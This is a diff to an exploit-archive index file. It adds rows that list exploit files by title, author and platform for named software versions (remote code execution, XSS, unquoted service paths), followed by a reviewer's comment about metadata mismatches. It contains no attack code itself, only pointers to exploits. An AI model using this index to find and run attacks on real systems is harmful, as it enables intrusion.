@@ -11489,6 +11489,8 @@ id,file,description,date,author,type,platform,port
 50953,exploits/windows/local/50953.txt,"Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
 50954,exploits/windows/local/50954.txt,"Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)",1970-01-01,"Eduardo Braun Prado",local,windows,
 50959,exploits/windows/local/50959.txt,"HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path",1970-01-01,"Ali Alipour",local,windows,
+50975,exploits/windows/local/50975.txt,"Kite 1.2021.610.0 - Unquoted Service Path",1970-01-01,"Ghaleb Al-otaibi",local,windows,
+50977,exploits/windows/local/50977.txt,"Dr. Fone 4.0.8 - 'net_updater32.exe' Unquoted Service Path",1970-01-01,Esant1490,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18712,6 +18714,7 @@ id,file,description,date,author,type,platform,port
 50964,exploits/multiple/remote/50964.py,"Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)",1970-01-01,Altelus,remote,multiple,
 50972,exploits/windows/remote/50972.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)",1970-01-01,RedHatAugust,remote,windows,
 50973,exploits/multiple/remote/50973.py,"Nginx 1.20.0 - Denial of Service (DOS)",1970-01-01,"Mohammed Alshehri",remote,multiple,
+50974,exploits/windows/remote/50974.py,"IOTransfer 4.0 - Remote Code Execution (RCE)",1970-01-01,"Tomer Peled",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45036,3 +45039,6 @@ id,file,description,date,author,type,platform,port
 50969,exploits/php/webapps/50969.txt,"WordPress Plugin Weblizar 8.9 - Backdoor",1970-01-01,"Sobhan Mahmoodi",webapps,php,
 50970,exploits/php/webapps/50970.py,"WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)",1970-01-01,cxosmo,webapps,php,
 50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnz,webapps,multiple,
+50976,exploits/php/webapps/50976.txt,"Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Giulio Garzia Ozozuz",webapps,php,
+50978,exploits/php/webapps/50978.py,"CodoForum v5.1 - Remote Code Execution (RCE)",1970-01-01,"Krish Pandey",webapps,php,
+50979,exploits/multiple/webapps/50979.py,"OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)",1970-01-01,"Thomas Knudsen",webapps,multiple,
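Review bot: The new `50979` row credits only `"Thomas Knudsen"`, while the header of `exploits/multiple/webapps/50979.py` in this same commit reads `Exploit Author: Samy Younsi, Thomas Knudsen`; the `50974` row in the second hunk of this file titles the entry `IOTransfer 4.0`, whereas that file's header says `IOTransfer V4` with `Version: V4 and onward`. The index is what users search and cite, so each row should be generated from, or reconciled with, the file header it points to.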